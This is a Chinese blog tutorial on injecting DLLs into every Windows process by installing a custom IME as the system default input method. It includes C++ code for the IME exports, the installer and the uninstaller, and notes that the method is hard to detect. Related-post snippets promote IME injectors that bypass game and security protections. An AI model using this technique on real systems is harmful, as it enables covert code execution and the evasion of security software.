Dll注入技术之输入法注入

最新推荐文章于 2024-04-28 12:12:51 发布
最新推荐文章于 2024-04-28 12:12:51 发布
阅读量2.6k 收藏 3
点赞数
分类专栏: 代码收藏
LL注入技术之输入法注入

    输入法注入原理是利用Windows系统中在切换输入法需要输入字符时,系统就会把这个输入法需要的ime文件装载到当前进程中,而由于这个Ime文件本质上只是个存放在C:\WINDOWS\system32目录下的特殊的DLL文件,因此我们可以利用这个特性,在Ime文件中使用LoadLibrary()函数待注入的DLL文件。
1.编写Ime文件

    输入法的Ime文件其实就是个显式导出19个特殊函数的DLL文件。如下图所示:


[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. ImeConversionList           //将字符串或字符转换成目标字串    
  2. ImeConfigure                //配置当前ime参数函数    
  3. ImeDestroy                  //退出当前使用的IME    
  4. ImeEscape                   //应用软件访问输入法的接口函数    
  5. ImeInquire                  //启动并初始化当前ime输入法    
  6. ImeProcessKey               //ime输入键盘事件管理函数    
  7. ImeSelect                   //启动当前的ime输入法    
  8. ImeSetActiveContext         //设置当前的输入处于活动状态    
  9. ImeSetCompositionString     //由应用程序设置输入法编码    
  10. ImeToAsciiEx                //将输入的键盘事件转换为汉字编码事件    
  11. NotifyIME                   //ime事件管理函数    
  12.     
  13. ImeRegisterWord             //向输入法字典注册字符串    
  14. ImeUnregisterWord           //删除被注册的字符串    
  15. ImeGetRegisterWordStyle    
  16. ImeEnumRegisterWord    
  17.     
  18. UIWndProc        //用户界面接口函数    
  19. StatusWndProc    //状态窗口注册函数    
  20. CompWndProc      //输入编码窗口注册函数    
  21. CandWndProc      //选择汉字窗口注册函数  


如果想编写输入法程序,那么这19个导出函数都需要仔细的研究,但是对于只想实现注入的我们,现在只需要对ImeInquire()有比较深的认识就可以了。ImeInquire()是启动并初始化当前Ime输入法函数,他的声明如下:

  1. BOOL WINAPI ImeInquire(LPIMEINFO lpIMEInfo,LPTSTR lpszUIClass,LPCTSTR lpszOption)
第一个参数lpIMEInfo比较重要,用于输入对Ime输入法初始化的内容结构,如果这个结构填写错误,就会导致输入法不能正常运行。第二个参数是输入一个class类名,我们需要先使用RegisterClassEx()注册出一个窗口类。初始化ImeInquire()主要代码如下所示:
[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. //启动并初始化当前ime输入法    
  2. BOOL WINAPI ImeInquire(LPIMEINFO lpIMEInfo,LPTSTR lpszUIClass,LPCTSTR lpszOption)    
  3. {    
  4.     //输入法初始化过程    
  5.     //系统根据它为INPUTCONTEXT.hPrivate分配空间    
  6.     lpIMEInfo->dwPrivateDataSize = 0;     
  7.     lpIMEInfo->fdwProperty = IME_PROP_KBD_CHAR_FIRST |    
  8.         IME_PROP_IGNORE_UPKEYS |    
  9.         IME_PROP_END_UNLOAD;     
  10.     
  11.     lpIMEInfo->fdwConversionCaps = IME_CMODE_FULLSHAPE |    
  12.         IME_CMODE_NATIVE;    
  13.     
  14.     lpIMEInfo->fdwSentenceCaps = IME_SMODE_NONE;    
  15.     lpIMEInfo->fdwUICaps = UI_CAP_2700;    
  16.     
  17.     lpIMEInfo->fdwSCSCaps = 0;    
  18.     
  19.     lpIMEInfo->fdwSelectCaps = SELECT_CAP_CONVERSION;    
  20.     
  21.     // 注意该输入法基本窗口类必须注册,否则输入法不能正常运行    
  22.     _tcscpy(lpszUIClass,CLSNAME_UI);    
  23.     return TRUE;    
  24. }    

注册出一个窗口类的主要代码如下:

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. BOOL ImeClass_Register(HINSTANCE hInstance)    
  2. {    
  3.     WNDCLASSEX wc;    
  4.     wc.cbSize         = sizeof(WNDCLASSEX);    
  5.     wc.style          = CS_VREDRAW | CS_HREDRAW | CS_DBLCLKS | CS_IME;    
  6.     wc.lpfnWndProc    = UIWndProc;    
  7.     wc.cbClsExtra     = 0;    
  8.     wc.cbWndExtra     = 2 * sizeof(LONG);    
  9.     wc.hInstance      = hInstance;    
  10.     wc.hCursor        = LoadCursor( NULL, IDC_ARROW );    
  11.     wc.hIcon          = NULL;    
  12.     wc.lpszMenuName   = (LPTSTR)NULL;    
  13.     wc.lpszClassName  = CLSNAME_UI;    
  14.     wc.hbrBackground  = NULL;    
  15.     wc.hIconSm        = NULL;    
  16.     
  17.     if( !RegisterClassEx( (LPWNDCLASSEX)&wc ) )    
  18.         return FALSE;    
  19.     
  20.     return TRUE;    
  21. }    

CLSNAME_UI是一个宏定义,如下:

  1. #define CLSNAME_UI _T("DLLCLASSNAME")
在DllMain进程加载的过程中注册窗口类,主要代码如下:

PS: 编写DLL时需要注意,当作IME文件的Dll需要有版本信息,Version资源中FILETYPE为VFT_DRV, FILESUBTYPE为VFT2_DRV_INPUTMETHOD,否则调用ImmInstallIME安装时会失败
2.编写装载输入法程序:
装载输入法的基本逻辑就是将他们编写的输入法设置为默认输入法,这样只要系统中所有进程都会默认加载他们的恶意输入法程序。
黑客们首先需要得到系统当前的默认的输入法,以便恢复时使用。然后需要将ime文件拷贝到C:\WINDOWS\system32目录下,最后将装载成功后将我们的输入法设置成为默认输入法,主要代码如下:

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. void CMfcImeInjectDlg::OnBnClickedAttach()    
  2. {    
  3.     // TODO: 在此添加控件通知处理程序代码    
  4.     //得到默认的输入法句柄并保存    
  5.     ::SystemParametersInfo(    
  6.         SPI_GETDEFAULTINPUTLANG,    
  7.         0,    
  8.         &m_retV,    
  9.         0);    
  10.     
  11.     //拷贝到system目录,只有ime文件在system32下才能装载成功    
  12.     CopyFile(    
  13.         _T("D:\\MyDll\\ImeInject\\Debug\\MyImeDll.ime"),    
  14.         _T("C:\\WINDOWS\\system32\\MyImeDll.ime"),    
  15.         FALSE);    
  16.     
  17.     //装载输入法    
  18.     m_hImeFile = ImmInstallIME(    
  19.         _T("MyImeDll.ime"),     
  20.         _T("我的输入法"));    
  21.     
  22.     if( ImmIsIME(m_hImeFile) )    
  23.     {    
  24.         //设置为默认输入法    
  25.         SystemParametersInfo(    
  26.             SPI_SETDEFAULTINPUTLANG,    
  27.             0,    
  28.             &m_hImeFile,    
  29.             SPIF_SENDWININICHANGE);    
  30.         MessageBox(_T("安装输入法成功"));    
  31.     }    
  32. }    

3.编写卸载输入法:
    当新建进程不再需要注入时,我们就需要卸载输入法。卸载输入法时需要先判定系统当前的输入法不是其原有默认输入法,确认无误后将系统的默认输入法恢复后,再将恶意输入法卸载即可,主要代码如下:

[cpp]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1. void CMfcImeInjectDlg::OnBnClickedDettach()    
  2. {    
  3.     // TODO: 在此添加控件通知处理程序代码    
  4.     ::SystemParametersInfo(    
  5.         SPI_SETDEFAULTINPUTLANG,    
  6.         0,    
  7.         &m_retV,    
  8.         SPIF_SENDWININICHANGE);    
  9.     if (UnloadKeyboardLayout(m_hImeFile))    
  10.     {    
  11.         MessageBox(_T("输入法卸载成功"));    
  12.     }    
  13. }    
  14.      

输入法注入的实现需要对输入法IME文件的生成有所了解,API使用较多,所以实现起来比较难,但是由于系统存在多个输入法,被注入进程很难判别当前是可信赖输入法还是用于注入的恶意输入法,所以难以阻止,大大提高了注入的几率。


寒江孤叶丶
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows Ring3层注入——输入注入(六)
qq_38493448的博客
01-16 1950
Windows Ring3层注入——输入注入(六)输入介绍输入注入原理输入注入的相关知识输入注入步骤输入注入的函数原型及代码示例输入注入操作描述流程图删除自己安装的输入: 输入介绍 输入是一类特殊的程序,主要功能在程序中是进行文字的输入,一般有外挂式(早期的“万能五笔”)和输入接口式两种实现方式。 外挂式比较简单,它的形式通常是一个EXE文件,通过模拟一些Windows输入...
输入DLL注入
11-05
输入DLL注入器喜欢下载感谢这个平台
Windows-注入技术学习总结
qin_code的博客
04-07 894
目录 1.远程线程注入 2.消息钩子注入 3.输入注入 4.注册表注入 5.EIP注入 6.APC注入 7.SSDT替换 总结 1.远程线程注入 原理:利用CreateRemoteThread()函数,将自己创建的的线程加载到远程空间进程里去执行。 CreateRemoteThread function (processthreadsapi.h) - Win32 apps | Microsoft Docs 注入流程: OpenProcess 打开被注入进程句柄。 Vir
抗艾程序员龚伦强谈:DLL注入输入注入C++实现源码
最新发布
湖北抗艾程序员龚伦强
04-28 493
输入注入是一种常见的DLL注入技术,利用系统在切换输入时加载IME(Input Method Editor)模块的特性,将恶意的DLL文件注入到目标进程中,以实现攻击目的。
输入注入dll
o330820350的专栏
09-04 1166
[cpp] view plaincopy ImmInstallIME("C:/WINDOWS/system32/123.dll","扩展输入");    typedef int (CALLBACK * IMESetPubStringFunc)(LPCTSTR tmpStr,DWORD UnloadDLL,DWORD loadNextIme,DWORD DllDat
输入注入及防护分析
研究源码的最底层,只持有正确的仓位
01-15 3482
 一 .输入原理: 输入的ime文件实质是个dll文件,导出windows的imm输入管理器调用的一些回调函数。 初始化: DllMain里注册窗口类 1. ImeInquire里告诉imm输入的me消息窗口的类名 2. imm根据这个类名创建ime消息窗口 3. 消息窗口的回调函数被调用, 消息是wm_create 至此, ...
DLL注入技术输入注入
03-22 6990
输入注入原理是利用Windows系统中在切换输入需要输入字符时,系统就会把这个输入需要的ime文件装载到当前进程中,而由于这个Ime文件本质上只是个存放在C:\WINDOWS\system32目录下的特殊的DLL文件,因此我们可以利用这个特性,在Ime文件中使用LoadLibrary()函数待注入DLL文件。 1.编写Ime文件     输入的Ime文件其实就是个显式导出19个特殊函
输入注入dll.ec
07-16
易语言:输入形式注入dll到游戏进程内,有效过掉检测,简单一句代码调用。
利用输入注入DLL
05-19
全软件屏蔽的DLL注入,后来发现,输入程序就是能完成这一任务的理想人选。输入 程序程序到底是什么?它没有自己的进程,并且在系统还没有登录时就已被加载(在欢迎 界面你也可以调出输入),它可以在...
DLL注入.ec
07-05
APC注入_内存 APC注入_应用层 ...输入注入 消息钩子注入 远程线程注入DLL 远程注入_调用函数 注册表注入 卸载内存注入 卸载输入注入 卸载消息钩子 卸载注册表注入 卸载远程线程DLL 卸载注册表注入
DLL注入输入与键盘HOOK
09-21
DLL注入输入与键盘HOOK.rar
利用输入注入任意DLL演示
07-02
利用输入注入任意DLL演示(可绕过大多数安全软件的检测,能够注入带有自我保护的进程)
输入注入DLL注入
03-13
输入注入,易语言DLL注入 简单易懂
VB输入注入DLL控件(过游戏保护)
11-20
VB输入注入DLL控件(过游戏保护),通过输入绕过防挂程序的检测
输入注入DLL
02-02
很强很好用。可以过TX的很多检测 不可用于非
游戏DLL万能输入注入器易语言源码
07-01
我自己用易语言改进的游戏输入注入器,如果有不行的地方请自行改进,自我感觉挺好的
DLL注入的8种姿势
热门推荐
VI___
08-24 1万+
目录 1、远程线程注入 2、APC注入 3、注册表注入 4、ComRes注入 5、劫持进程创建注入 6、输入注入 7、消息钩子注入 8、依赖可信任进程注入 一、DLL注入——远程线程注入 https://blog.csdn.net/Cody_Ren/article/details/100041660 二、DLL注入——APC注入 APC注入...
易语言输入注入dll到游戏进程
511遇见
05-28 4970
易语言的输入注入,需要一个易语言专门的输入,我们在这里集成到程序里,通过判断先写到system32目录 输入注入流程: 1、安装输入 2、激活一下 3、将输入文件复制到c:\WINDOWS\system32\ 4、开始注入(IMESetPubString) 5、激活目标进程输入 6、启动注入函数 7、卸载输入UnloadKeyboardLayout 释放输入 .版本 2 .局部变量 lret, 逻辑型 .判断开始 (寻找文件 (目录_取system32目录 () + “EI..
DLL 注入的三种方详解
weixin_51409218的博客
02-27 3783
DLL注入的三种方式
delphi dlldll注入
08-07
Delphi是一种编程语言,而DLL(Dynamic-Link Library)是一种模块化的文件格式,用于存储代码和数据,可以被多个应用程序共享。DLL注入是一种技术,它允许将DLL文件加载到正在运行的进程中,并使得该进程能够调用DLL中的函数和使用其中的数据。 在Delphi中实现DLL注入的方有很多种。一种常见的方是使用Windows API函数LoadLibrary和GetProcAddress。通过调用LoadLibrary函数,将DLL文件加载到进程的虚拟地址空间中。然后使用GetProcAddress函数获取DLL中导出函数的地址,并将其传递给需要调用的函数。通过这种方式,可以在运行时将DLL注入到目标进程中,并且通过调用DLL中的函数来扩展进程的功能。 DLL注入在实际应用中有多种用途。例如,可以使用DLL注入来为某个程序添加额外的功能或修改程序的行为。DLL注入还可以用于实现一些调试和监控的功能。通过注入DLL,可以截获程序的输入和输出,或者在程序执行某些指定的操作时进行额外的处理。 在Delphi中实现DLL注入需要一定的编程知识和技巧。需要考虑目标进程的架构和权限限制,以及如何管理注入DLL的生命周期和资源管理。同时,还需要处理一些安全性和稳定性方面的问题,以确保注入过程不会对目标进程造成损害或崩溃。 总之,Delphi可以通过调用Windows API函数来实现DLL注入,从而扩展和修改进程的功能。但在实际应用中,需要考虑各种方面的问题,并且遵守相关的律和规定,以确保注入操作的安全性和合性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值